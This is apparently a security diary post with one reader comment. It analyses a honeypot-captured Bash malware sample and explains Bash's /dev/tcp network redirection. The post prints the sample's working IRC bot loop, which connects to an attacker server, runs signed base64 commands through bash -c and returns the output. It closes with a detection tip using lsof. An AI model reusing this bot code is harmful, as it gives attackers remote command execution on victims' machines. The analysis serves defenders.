One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry. It's a simple UNIX Bash script that performs a bunch of malicious tasks:
The script itself is not new, it was already spotted in July 2017 but it looks to be slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is the ability to run a simple IRC bot in using Bash commands. No need for a high-level language. Bash has a very interesting feature for years that not many people are aware of. You can generate network flows using standard redirections. By default, a UNIX process has always the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like: $ echo "Hello world" >/dev/stderr In the same way, Bash can use /dev/tcp or /dev/udp to generate network flow. The syntax is /dev/<proto>/>host>/>port>. That's the feature used in the sample. Here is how to create a simple bot (the code has been beautified): eval 'exec 3<>/dev/tcp/$ircserver/6667;' if [[ ! "$?" -eq 0 ]] ; then continue fi eval 'printf "NICK $NICK\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then continue fi eval 'printf "USER user 8 * :IRC hi\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then continue fi # Main loop while [ true ]; do eval "read msg_in <&3;" if [[ ! "$?" -eq 0 ]] ; then break fi if [[ "$msg_in" =~ "PING" ]] ; then printf "PONG %s\n" "${msg_in:5}"; eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi sleep 1 eval 'printf "JOIN #biret\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then privmsg_h=$(echo $msg_in| cut -d':' -f 3) privmsg_data=$(echo $msg_in| cut -d':' -f 4) privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1) hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'` sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin` if [[ "$sign" == "$hash" ]] ; then CMD=`echo $privmsg_data | base64 -d -i` RES=`bash -c "$CMD" | base64 -w 0` eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi fi fi done The magic line is the first one which created a new file descriptor ('3') that will be used to read/write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages (once authenticated). The result of the command is sent back. Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use this specific feature, you can always recompile a Bash with the following directive '--enable-net-redirections'. This can be helpful in many cases. Example to grab data from a remote server without external tools: exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5 cat <&5 exec 5>&- A simple way to detect this behaviour is to search for network flows generated by /bin/bash processed. Example using lsof[3]: # lsof -i | grep bash bash 81084 xavier 5u IPv4 0x1cbc30b70d8a7879 0t0 TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED) [1] https://isc.sans.edu/honeypot.html Xavier Mertens (@xme) |
Xme 580 Posts ISC Handler Apr 25th 2018 |
Thread locked Subscribe |
Apr 25th 2018 2 years ago |
Dont you just love the bourne again shell? Should be the title for the next jason bourne movie honestly. Many thanks for showing me something else this wonderfull shell can do. Do you think something like this could replace nping? And ncat? Im going to try it out.
|
Anonymous |
Quote |
Apr 29th 2018 2 years ago |
Sign Up for Free or Log In to start participating in the conversation!